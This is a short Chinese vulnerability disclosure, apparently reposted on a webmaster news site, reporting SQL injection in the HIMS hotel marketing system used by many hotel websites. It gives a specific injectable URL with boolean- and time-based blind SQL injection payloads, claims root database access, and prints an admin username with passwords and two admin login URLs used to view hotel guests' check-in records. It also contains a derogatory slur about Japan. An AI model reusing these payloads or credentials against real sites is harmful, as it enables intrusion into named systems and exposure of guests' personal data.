罗盘互联网营销解决方案(HIMS)SQL注入下载

SQL注入

http://www.wxinn.com/hotel/PhotoC.php?type=1 可注入链接

注入类型

Parameter: type

Type: boolean-based blind

Title: AND boolean-based blind – WHERE or HAVING clause

Payload: type=1' AND 7068=7068 AND 'aBZa'='aBZa

Type: AND/OR time-based blind

Title: MySQL > 5.0.11 AND time-based blind

Payload: type=1' AND SLEEP(5) AND 'naeJ'='naeJ

该酒店用的是北京万维罗盘信息技术有限公司的 罗盘互联网营销解决方案(HIMS)。 该域名竟然解析到了小日本的ip上。

该ip下竟然有200多个网站,基本都是酒店的

罗盘互联网营销解决方案(HIMS)<a target=SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136352.gif" border="0" "/>

root权限

罗盘互联网营销解决方案(HIMS)<a target=SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136155.gif" border="0" "/>

数据库个数

罗盘互联网营销解决方案(HIMS)<a target=SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136854.gif" border="0" "/>

服务器中的部分数据库,一个数据库一个网站

罗盘互联网营销解决方案(HIMS)<a target=SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136422.gif" border="0" "/>

使用一个用户hims ipms123/luopan123456 登录两个网站后台

http://www.6877777.com/admin/login.php丽江和玺酒店

罗盘互联网营销解决方案(HIMS)<a target=SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254136712.gif" border="0" "/>

http://www.wxinn.com/admin/login.php文星连锁酒店,查看入住用户信息

罗盘互联网营销解决方案(HIMS)<a target=SQL注入,涉及多个酒店用户信息泄露" width="600" src="/Article/UploadPic/2014-7/20147254137917.gif" border="0" "/>

上一篇: 中国电信安徽省某分站一处Oracle注入下载
下一篇: [公开漏洞]联通某站点root权限SQL盲注
当前位置:站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细